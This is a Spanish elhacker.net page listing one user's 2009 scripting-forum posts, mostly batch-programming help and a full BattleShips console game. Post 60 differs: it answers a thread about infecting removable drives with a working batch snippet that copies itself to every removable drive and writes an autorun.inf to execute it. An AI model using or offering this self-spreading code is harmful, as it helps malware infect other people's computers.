elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Únete al Grupo Steam elhacker.NET


  Mostrar Mensajes
Páginas: 1 2 3 4 5 [6] 7 8 9 10 11 12 13 14 15 16 17 18
51  Programación / Scripting / Re: :::reproductor en batch-vbs(ayuda)::::::::: en: 11 Abril 2009, 18:27 pm
Dejaria que te respondiese Novlucker, pues es el autor original del Script (en parte mio tambien :P )

Mira que el codigo que pones es un BAT que crea un VBS mediante redireccion, el VBS recibe un parametro en la linea Wscript.Arguments.Item(0) la cual viene siendo el primer paramtro que es pasado al mismo, si sigues mirando la sintaxis te daras cuenta que el BAT recibe tambien un parametro %1 que vendria siendo la ruta del archivo que tu le pongas encima 8lo que se conoce como arrastrar), luego el recibe la ruta del archivo y luego se la pasa al script VBS

start %temp%\player.vbs %1

Si quieres que se ejecute a determinada hora, podrias modificar el BAT para que use el comando AT, creas el VBS con la ruta de la cancion o lo que quieras que escuche, ya luego programas para que dicho VBS se ejecute a determinada hora...

Mira la ayuda del comando AT

Saludos.
52  Programación / Scripting / Re: Elevar a cualquier potencia. en: 9 Abril 2009, 23:30 pm
Me gusta la parte en que compruebas la introduccion de numeros menores, podria hacerse para negativos :P

Código:
@echo off
REM Funcion Potenciacion
REM Coded by :: SmartGenius ::
if ["%1"]==[""] goto :sintaxis
setlocal enabledelayedexpansion

:main
set pot=1
for /f "tokens=1-2 delims=p" %%a in ("%1") do (
for /l %%c in (1,1,%%b) do (set /a pot=!pot!*%%a))
echo %pot%
endlocal
goto :eof

:sintaxis
echo Modo de Uso:
echo.
echo %~n0 Base_p_Exponente
echo.
echo Ej: 2p5 2=Base 5=Exponente ==^> Resultado: 32
goto :eof

Saludos.
53  Programación / Scripting / Re: Filtro Anti- BatchInyection en: 4 Abril 2009, 15:32 pm
Simple y efectivo  ;D

Gracias por compartirlo... !!

Saludos.
54  Programación / Scripting / Re: [BATCH] Bug comando for (eol) en: 1 Abril 2009, 14:06 pm
jajjaa...me dio risa lo de 14 años y nada que lo solucionan..es que definitivamente en microsoft no terminan de hacer las vainas...aparte ahora estan concentrados en otras vainas...y ya no prestan mucha atencion a lo relacionado con DOS....

Saludos.
55  Programación / Scripting / Re: [Batch Game] PushBox v 2 Reloaded - by :: SmartGenius :: en: 31 Marzo 2009, 21:16 pm
Actualicé  el archivo con 5 nuevos niveles.


Gracias.....estan muy buenos...xD....esperemos pronto seguir desarrollandolo :P

Saludos.
56  Programación / Scripting / Re: MapGame 2.0 .: By PonyMagic :. en: 31 Marzo 2009, 18:17 pm
Interesante aporte men.....ya habia visto el otro...pero veo que has mejorado......

Esto podria ser para hacer un jueguito tipo laberinto o alguna cosa asi.....jeje...a mi tambien me gusta la idea del desarrollo de juegos en batch.....pa que vean lo que se puede hacer....solo que no he creado un motor completamnete :rolleyes:

Saludos.
57  Programación / Scripting / [Batch Game] BattleShips v 1 - by :: SmartGenius :: en: 31 Marzo 2009, 18:10 pm
Sip, aqui de nuevo yo...con otro juego Batch  :xD

BattleShips v 1


Descarga:http://one.xthost.info/smartv2/BatchGames/BattleShips_bySmartGenius.zip

Creo que el juego no necesita explicacion porque la gran mayoria conocera la mecanica del mismo, ir descubriendo la posicion del enemigo antes de que descubarn la tuya.

Los movimientos se realizan con las flechas de direccion y se confirma una coordenada con la tecla Enter.

Código:
@echo off
@title BattleShip
@::Another Batch Game
@::Coded by ::SmartGenius::
setlocal enabledelayedexpansion

if not exist "keyboard.exe" (Goto :NoKey)

Call :Logo

:Menu
@cls
@::BattleShip v 1
@mode con cols=21 lines=20
set colors=a123b567c9
echo.
echo. BattleShips v 1
echo. ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
echo. ÚÄÄ¿ ÚÄÄÄÄÄÄ¿
echo. ³1.³ ³Jugar ³
echo. ÀÄÄÙ ÀÄÄÄÄÄÄÙ
echo. ÚÄÄ¿ ÚÄÄÄÄÄÄ¿
echo. ³2.³ ³Salir ³
echo. ÀÄÄÙ ÀÄÄÄÄÄÄÙ
keyboard
if "%errorlevel%"=="49" (Goto :InGame)
if "%errorlevel%"=="50" (msg * BattleShip v 1 by SmartGenius&exit)
if "%errorlevel%"=="32" (color 0!colors:~%random:~-1%,1!)
Goto :Menu

:InGame
Call :Clear
Call :Load1
cls
echo.
echo. Barcos en Posicion
echo. Cargando Juego...
ping -n 3 0.0.0.0 >nul
Call :Load2
Goto :Menu

::Tablero posicionador
:Load1
set LimX=6
set LimY=6
set IniX=0
set IniY=0
set MovX=0
set MovY=0
set Ships=5
set Water=²
set Blank=X

:init1
for /l %%a in (0,1,%LimX%) do (
for /l %%b in (0,1,%LimY%) do (
set X%%aY%%b=°
))
set X0Y0=
set Last=°
set Curpos=X0Y0
Goto :First

:Gp1
Call :Clear
:First
for /l %%d in (0,1,%LimY%) do (
for /l %%e in (0,1,%LimX%) do (
set Lin_%%d=!Lin_%%d!³!X%%eY%%d!))
echo.
echo. Posiciona tus
echo. Barcos...
echo.
echo.   ÚÄÄÄÄÄÄÄ¿
for /l %%f in (0,1,%LimY%) do (
echo.   !Lin_%%f!³
echo.   ÃÄÅÄÅÄÅÄÅÄÅÄÅÄ´)
echo.   ÀÄÁÄÁÄÁÄÁÄÁÄÁÄÙ
if "%Ships%"=="0" Goto :Eof
keyboard
if "%errorlevel%"=="77" (call :MovAX+ "%CurPos%")
if "%errorlevel%"=="75" (call :MovAX- "%CurPos%")
if "%errorlevel%"=="80" (call :MovAY+ "%CurPos%")
if "%errorlevel%"=="72" (call :MovAY- "%CurPos%")
if "%errorlevel%"=="13" (call :PosShip "%CurPos%")
if "%errorlevel%"=="88" (Goto :Menu)
if "%errorlevel%"=="120" (Goto :Menu)
Goto :Gp1
::Fin Tablero Posicionador

::Tablero de Batalla
:Load2
@mode con cols=42 lines=20
for /l %%a in (0,1,%LimX%) do (
for /l %%b in (0,1,%LimY%) do (
set MX%%aY%%b=
))
Call :GenPC

:init2
for /l %%a in (0,1,%LimX%) do (
for /l %%b in (0,1,%LimY%) do (
set PX%%aY%%b=!X%%aY%%b!
set X%%aY%%b=°))
set Player=5
set X0Y0=
set Last=°
set Curpos=X0Y0
Goto :Gp2

:Gp2
title BattleShip v 1 by SmartGenius
Call :Clear
:Second
for /l %%d in (0,1,%LimY%) do (
for /l %%e in (0,1,%LimX%) do (
set Lin_%%d=!Lin_%%d!³!PX%%eY%%d!
set Lin2_%%d=!Lin2_%%d!³!X%%eY%%d!))
echo.
echo.    Jugador: %Player%            PC: %PC%
echo.     A B C D E F G       A B C D E F G
echo.    ÚÄÄÄÄÄÄÄ¿ :   ÚÄÄÄÄÄÄÄ¿
for /l %%f in (0,1,%LimY%) do (
echo. %%f  !Lin_%%f!³ : %%f !Lin2_%%f!³
echo.    ÃÄÅÄÅÄÅÄÅÄÅÄÅÄ´ :   ÃÄÅÄÅÄÅÄÅÄÅÄÅÄ´)
echo.    ÀÄÁÄÁÄÁÄÁÄÁÄÁÄÙ :   ÀÄÁÄÁÄÁÄÁÄÁÄÁÄÙ
if "%PC%"=="0" Goto :Win
if "%Player%"=="0" Goto :Lose
keyboard
if "%errorlevel%"=="77" (call :MovAX+ "%CurPos%")
if "%errorlevel%"=="75" (call :MovAX- "%CurPos%")
if "%errorlevel%"=="80" (call :MovAY+ "%CurPos%")
if "%errorlevel%"=="72" (call :MovAY- "%CurPos%")
if "%errorlevel%"=="13" (
call :Player "%CurPos%"
Call :MovPC
)
if "%errorlevel%"=="88" (Goto :Menu)
if "%errorlevel%"=="120" (Goto :Menu)
Goto :Gp2
::Fin Tablero de Batalla

:MovAX+
for /f "tokens=1,2 delims=X,Y" %%p in ("%~1") do (
if "%%p"=="%LimX%" Goto :Eof
if !%~1!== set %~1=%Last%
set /a MovX=%%p+1
call set Last=%%X!MovX!Y%%q%%
set X!MovX!Y%%q=
set CurPos=X!MovX!Y%%q
)
Goto :Eof

:MovAX-
for /f "tokens=1,2 delims=X,Y" %%p in ("%~1") do (
if "%%p"=="%IniX%" Goto :Eof
if !%~1!== set %~1=%Last%
set /a MovX=%%p-1
call set Last=%%X!MovX!Y%%q%%
set X!MovX!Y%%q=
set CurPos=X!MovX!Y%%q
)
Goto :Eof

:MovAY+
for /f "tokens=1,2 delims=X,Y" %%p in ("%~1") do (
if "%%q"=="%LimY%" Goto :Eof
if !%~1!== set %~1=%Last%
set /a MovY=%%q+1
call set Last=%%X%%pY!MovY!%%
set X%%pY!MovY!=
set CurPos=X%%pY!MovY!
)
Goto :Eof

:MovAY-
for /f "tokens=1,2 delims=X,Y" %%p in ("%~1") do (
if "%%q"=="%IniY%" Goto :Eof
if !%~1!== set %~1=%Last%
set /a MovY=%%q-1
call set Last=%%X%%pY!MovY!%%
set X%%pY!MovY!=
set CurPos=X%%pY!MovY!
)
Goto :Eof

:GenPC
set PC=5
set R1=%random:~-1%
set R2=%random:~-1%
if not "%R1%" GTR "%LimX%" (
if not "%R2%" GTR "%LimY%" (
set MX%R1%Y%R2%=Û
set /a var+=1
))
if "%var%"=="%PC%" Goto :Eof
Goto :GenPC

:MovPC
set R1=%random:~-1%
set R2=%random:~-1%
if not "%R1%" GTR "%LimX%" (
if not "%R2%" GTR "%LimY%" (
call set Tar=!PX%R1%Y%R2%!
if "!Tar!"=="X" (
Goto :MovPC
)
if "!Tar!"=="" (
Goto :MovPC
)
if "!Tar!"=="Û" (
set PX%R1%Y%R2%=
set /a Player-=1
Goto :Eof
) else (
set PX%R1%Y%R2%=X
Goto :Eof
)
))
Goto :MovPC

:PosShip
if not "%Last%"=="Û" (
set %~1=Û
set /a Ships-=1)
Goto :Eof

:Player
if defined M%~1 (
set %~1=Û
set /a PC-=1
Goto :Eof
)
set %~1=%Blank%
Goto :Eof

:Lose
msg * Perdiste !
ping -n 3 0.0.0.0 >nul
Goto :Menu

:Win
msg * Ganaste !
ping -n 3 0.0.0.0 >nul
Goto :Menu

:Clear
for /l %%m in (0,1,%LimY%) do (
set Lin_%%m=
set Lin2_%%m=
)
Goto :Eof

:Logo
@mode con cols=40 lines=15
@title BattleShips v 1 by SmartGenius
echo.
echo.                 _==^|
echo.   Battle   _==^|   )__)  ^|  Ships
echo.              )_)  )___) ))
echo.             )___) )____))_)
echo.        _    )____)_____))__)\
echo.         \---__^|____/^|___^|___-\\---
echo. ~~~~~~~~~\   oo oo oo oo     /~~~~~~~~
echo.   ~~~~~~ ~~~~~~~~~~~~~~~~~~~~~
echo.     ~~~~      ~~~~     ~~~~ ~~ ~~
echo.          ~~~~~        ~~~~~
echo.
echo.         SmartGenius, Corp. 2009
pause >nul
ping -n 3 0.0.0.0 >nul
Goto :Eof

:NoKey
cls
echo.
echo  Uno de los archivos necesarios para el
echo  funcionamiento de este Script no se
echo  encuentra.
echo.
echo  A Continuacion sera creado...
call :keyboard
ping -n 2 0.0.0.0 >nul
Goto :Menu

:keyboard
(
echo n keyboard.dat
echo e 0000 4D 5A 2E 00 01 00 00 00 02 00 00 10 FF FF F0 FF
echo e 0010 FE FF 00 00 00 01 F0 FF 1C 00 00 00 00 00 00 00
echo e 0020 B4 08 CD 21 3C 00 75 02 CD 21 B4 4C CD 21
echo rcx
echo 002E
echo w0
echo q
echo.
)>keyboard.dat
type keyboard.dat|debug>NUL 2>&1
del /f/q/a "keyboard.exe">NUL 2>&1
ren keyboard.dat "keyboard.exe"
Goto :Eof

Espero sea de su agrado..cualquier duda o comentario por favor hacerlo... !!

Saludos.  =D
58  Programación / Scripting / Re: [Batch Game] PushBox v 2 Reloaded - by :: SmartGenius :: en: 31 Marzo 2009, 05:21 am
Se que te gusta el juego porque incita al jugador a pensar en una solucion.... :P

Gracias por tu trabajo men, esta muy bueno lo que has hecho...ya estaremos en contacto para seguirlo desarrollando...

Saludos.
59  Programación / Scripting / Re: [Batch Game] PushBox v 2 Reloaded - by :: SmartGenius :: en: 30 Marzo 2009, 17:03 pm
El juego lo tengo listo, lo único que me falta es solucionar un problema del nivel oculto, son de esos problemas "extraños".

Aquí está lo que llevo:
http://wikisend.com/download/504864/alpha.exe

Es una versión alpha, aún no terminada.
Se juega con la wsad. r para reiniciar nivel x para salir
Al nivel oculto se accede cuando te pregunta que escogas nivel, allí escribes -1, el problema está en que no logro empujar la caja desde el otro extremo, para moverla, espero esta tarde lograr con la solución, los otros niveles funcionan correctamente.


Me gusta...lo veo bien, y con la coleccion de los 10 levels...xD xD

Veo que para el level oculto no has puesto alguna forma de llevar la BOX al punto final...osea...sale rodeada. y no hay opcion de pasarlo por ningun lado.. :P

Me interesa saber como has empaquetado el ejecutable....es  batch o lo programaste en C, porque estaria bueno que fuese multiplataforma... pasame algo dle source que has hehco...y tambien lo que tienes del level oculto...ya te mandare yo algunos levels que vaya haciendo... y completamos el juego

Saludos.

PD: 1x1x1x1x1
60  Programación / Scripting / Re: Script batch para infeccion a traves de Unidades Extraibles en: 30 Marzo 2009, 16:00 pm
Creo que deberias usa otro medoto que sea factible para cualquier usuario, porque el uso de FSUTIL esta limitado a users con privilegios administrativos...

Código:
@echo off
for %%a in (C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z) do (
for /f "tokens=1" %%b in ('fsutil fsinfo drivetype %%a:^| find "extra"') do (
copy /y "%~0" "%%b:\codigo.bat"&echo.[autorun]>>"%%b:\autorun.inf"&echo.open=codigo.bat>>"%%b:\autorun.inf"))
Goto :Eof

Tambien podrias en el segundo FOR crear un ARRAY con todas las Letras que corresponden a los extraibles y guardarlo como variable para usarlo en cualqueir lado....

Saludos.
Páginas: 1 2 3 4 5 [6] 7 8 9 10 11 12 13 14 15 16 17 18
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines